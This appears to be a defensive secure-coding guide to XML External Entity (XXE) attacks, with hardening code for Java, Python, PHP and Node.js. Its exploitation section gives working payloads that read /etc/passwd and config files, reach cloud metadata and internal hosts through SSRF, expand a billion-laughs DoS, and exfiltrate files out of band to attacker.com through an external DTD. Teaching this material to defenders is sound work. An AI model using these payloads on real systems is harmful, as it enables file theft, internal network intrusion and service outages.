high | OWASP A05:2021 | CWE-611

XML External Entity (XXE)

XML External Entity (XXE) attacks exploit XML parsers that resolve external entity references in untrusted input. When an application accepts XML and its parser has external entities enabled, an attacker can read local files, make the server send requests on their behalf (server-side request forgery, SSRF), or cause denial of service. Many XML parsers ship with defaults that leave these features enabled.

Understanding XML Entities

XML entities are placeholders that expand when the document is parsed. External entities reference content from outside the document - files, URLs, or other resources:

xml
<?xml version="1.0"?>
<!DOCTYPE note [
  <!-- Internal entity -->
  <!ENTITY greeting "Hello World">
  
  <!-- External entity - reads local file -->
  <!ENTITY secret SYSTEM "file:///etc/passwd">
  
  <!-- External entity - makes HTTP request -->
  <!ENTITY external SYSTEM "http://attacker.com/malicious.dtd">
]>
<note>
  <message>&greeting;</message>      <!-- Expands to "Hello World" -->
  <data>&secret;</data>              <!-- Expands to /etc/passwd contents -->
</note>
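To watch expansion happen, here is a minimal sketch using Python's standard-library `xml.etree.ElementTree`. It parses only the internal entity from the example above; the `DOCUMENT` and `message` names are illustrative, not part of any API.

```python
import xml.etree.ElementTree as ET

# Same shape as the example above, limited to the internal entity.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE note [
  <!ENTITY greeting "Hello World">
]>
<note>
  <message>&greeting;</message>
</note>"""

root = ET.fromstring(DOCUMENT)

# The parser has already replaced &greeting; with its declared value.
message = root.find("message").text
print(message)  # Hello World
```

The application code never sees `&greeting;`: substitution happens inside the parser, which is why entity handling has to be controlled through parser configuration rather than by inspecting the parsed tree.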

Basic XXE Exploitation

File Disclosure

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInfo>
  <username>&xxe;</username>
</userInfo>

<!-- Server response includes file contents: -->
<userInfo>
  <username>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
  </username>
</userInfo>

Reading Source Code

xml
<?xml version="1.0"?>
<!-- PHP targets only: use php:// filter to base64-encode the file (avoids XML parsing issues) -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">
]>
<data>&xxe;</data>

<!-- Windows targets: swap one of these declarations into the DOCTYPE -->
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
<!ENTITY xxe SYSTEM "file:///c:/inetpub/wwwroot/web.config">

SSRF via XXE

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!-- Scan internal network -->
  <!ENTITY ssrf SYSTEM "http://192.168.1.1/admin">
  
  <!-- Access cloud metadata -->
  <!ENTITY metadata SYSTEM "http://169.254.169.254/latest/meta-data/">
  
  <!-- Internal services -->
  <!ENTITY redis SYSTEM "http://localhost:6379/">
]>
<data>&ssrf;</data>
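The targets above have one thing in common: each resolves to an address that is only reachable from inside the server's network. As a rough sketch of how a defender might flag such system identifiers in logs or tests, the hypothetical helper `is_internal_target` below classifies a URL's host with the standard `ipaddress` module. It does not resolve DNS names, so it is an illustration of the idea and not a substitute for network-level egress filtering.

```python
import ipaddress
from urllib.parse import urlsplit


def is_internal_target(system_id: str) -> bool:
    """Return True if the URL's host is loopback, private, or link-local."""
    host = urlsplit(system_id).hostname
    if host is None:
        # No network host at all, e.g. file:///etc/passwd.
        return False
    if host == "localhost":
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: this sketch does not resolve it, so it cannot classify it.
        return False
    return address.is_loopback or address.is_private or address.is_link_local


for url in (
    "http://192.168.1.1/admin",
    "http://169.254.169.254/latest/meta-data/",
    "http://localhost:6379/",
):
    print(url, is_internal_target(url))
```

All three URLs from the payload are reported as internal. A hostname that merely resolves to an internal address would slip past this check, which is one reason blocking outbound connections at the network layer is the more dependable control.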

Billion Laughs Attack (DoS)

xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

<!-- Under 1 KB of XML expands to 10^8 copies of "lol" (~300 MB) in memory; one more nesting level gives the classic ~3 GB -->
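The expanded size can be worked out without running the attack. Each nested entity multiplies the previous one by its fan-out, so the total is the base string's length times the fan-out raised to the number of nesting levels. The sketch below uses a hypothetical helper, `expanded_size`, to count the payload as written above (eight fan-out levels, `lol2` through `lol9`) and the classic nine-level variant that gives the attack its name.

```python
def expanded_size(base: str, fanout: int, levels: int) -> int:
    """Bytes produced when `base` is repeated `fanout` times per nesting level."""
    return len(base.encode("utf-8")) * fanout ** levels


# Payload above: lol2..lol9 are eight levels, each referencing the previous one 10 times.
as_written = expanded_size("lol", fanout=10, levels=8)
print(as_written)  # 300000000 bytes, about 300 MB

# Classic "billion laughs": one more level, giving 10**9 copies of "lol".
classic = expanded_size("lol", fanout=10, levels=9)
print(classic)  # 3000000000 bytes, about 3 GB
```

Growth is exponential in the number of levels while the document itself grows only linearly, so input size limits alone do not bound memory use. The parser must cap or refuse entity expansion.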

Blind XXE Exploitation

When the server does not reflect parsed XML in its response, attackers fall back to out-of-band techniques that make the server send the data to a host they control:

xml
<?xml version="1.0"?>
<!-- Payload sent to target -->
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<data>&exfil;</data>

<!-- evil.dtd on attacker's server -->
<!ENTITY % all "<!ENTITY exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%all;

<!-- Server makes request to attacker with file contents in URL -->

Prevention Strategies

Java XML Parser Hardening

java
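import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Secure DocumentBuilderFactory configuration
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();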

// Disable all external entities and DTDs
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(xmlInput);

Python XML Parser Hardening

python
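# RISKY - Standard library parsers are not hardened for untrusted input.
# ElementTree raises ParseError on external entities, but entity-expansion
# DoS (billion laughs) is still possible with Expat older than 2.4.1.
import xml.etree.ElementTree as ET
tree = ET.parse('file.xml')  # Not safe for untrusted XML

# SAFE - Use defusedxml library
import defusedxml.ElementTree as ET
tree = ET.parse('file.xml')  # Rejects entity declarations and external references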

# Or use lxml with safe settings
from lxml import etree

parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    dtd_validation=False,
    load_dtd=False
)
tree = etree.parse('file.xml', parser)
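If neither defusedxml nor lxml is available, one option is to refuse any document that declares a DOCTYPE before handing it to the real parser. The following is a minimal sketch using only the standard library; `DoctypeForbidden` and `parse_untrusted` are hypothetical names, and the two-pass design trades some speed for simplicity.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Expat calls this at the start of a DOCTYPE, before any entity is declared.
    raise DoctypeForbidden(f"DOCTYPE declaration not allowed: {name!r}")


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    # First pass: scan with Expat and abort at the first DOCTYPE.
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.Parse(xml_bytes, True)
    # Second pass: no DTD is present, so no custom entities can be declared.
    return ET.fromstring(xml_bytes)


root = parse_untrusted(b"<user><name>alice</name></user>")
print(root.find("name").text)

try:
    parse_untrusted(
        b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
    )
except DoctypeForbidden as error:
    print("rejected:", error)
```

Rejecting the DOCTYPE outright removes both external entities and entity-expansion attacks at once, at the cost of refusing legitimate documents that rely on a DTD.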

PHP XML Parser Hardening

php
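<?php
// UNSAFE - LIBXML_NOENT turns entity substitution ON (despite its name),
// and LIBXML_DTDLOAD loads the external DTD subset
$doc = new DOMDocument();
$doc->loadXML($userInput, LIBXML_NOENT | LIBXML_DTDLOAD);  // Vulnerable!

// PHP < 8.0 built against libxml2 < 2.9.0 - disable the external entity loader
libxml_disable_entity_loader(true);  // Deprecated in PHP 8.0+

// PHP 8.0+ (libxml2 >= 2.9.0) - external entity loading is off by default.
// Do NOT pass LIBXML_NOENT, LIBXML_DTDLOAD, or LIBXML_DTDATTR.
$doc = new DOMDocument();
$doc->loadXML($userInput, LIBXML_NONET);  // LIBXML_NONET also blocks network access

// Better: reject any document that declares a DOCTYPE
foreach ($doc->childNodes as $child) {
    if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
        throw new InvalidArgumentException('DOCTYPE is not allowed');
    }
}
?>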

Node.js XML Parser Hardening

javascript
// UNSAFE - noent: true turns entity substitution ON
const libxmljs = require('libxmljs');
const unsafeDoc = libxmljs.parseXml(userInput, { noent: true });  // Vulnerable!

// SAFE - Keep entity substitution off and block network access
const safeDoc = libxmljs.parseXml(userInput, {
  noent: false,        // Don't substitute entities
  nonet: true,         // Don't fetch network resources
  noblanks: true,      // Drop ignorable whitespace (not security-related)
  nocdata: true        // Merge CDATA into text nodes (not security-related)
});

// Even better: Use JSON instead of XML where possible
// Or use a streaming parser that doesn't support DTDs

Prefer JSON Over XML

javascript
// JSON cannot have external entities - inherently safe

// Instead of accepting XML:
app.post('/api/data', (req, res) => {
  const xml = req.body;  // Dangerous
  // Parse XML...
});

// Accept JSON:
app.post('/api/data', express.json(), (req, res) => {
  const data = req.body;  // Safe from XXE
  // Use data directly
});

// If you must accept XML, validate Content-Type
app.post('/api/data', (req, res) => {
  if (req.is('application/xml') || req.is('text/xml')) {
    // Parse with secure settings
  } else {
    res.status(415).send('Unsupported Media Type');
  }
});

Security Checklist

  • Disable DTD processing in all XML parsers
  • Disable external entity resolution
  • Use hardened libraries such as defusedxml (Python), or configure parsers explicitly with secure settings
  • Prefer JSON over XML for data exchange
  • Validate and sanitize XML input before parsing
  • Apply principle of least privilege to file system access
  • Block outbound connections from XML processing services
  • Audit third-party libraries for XXE vulnerabilities
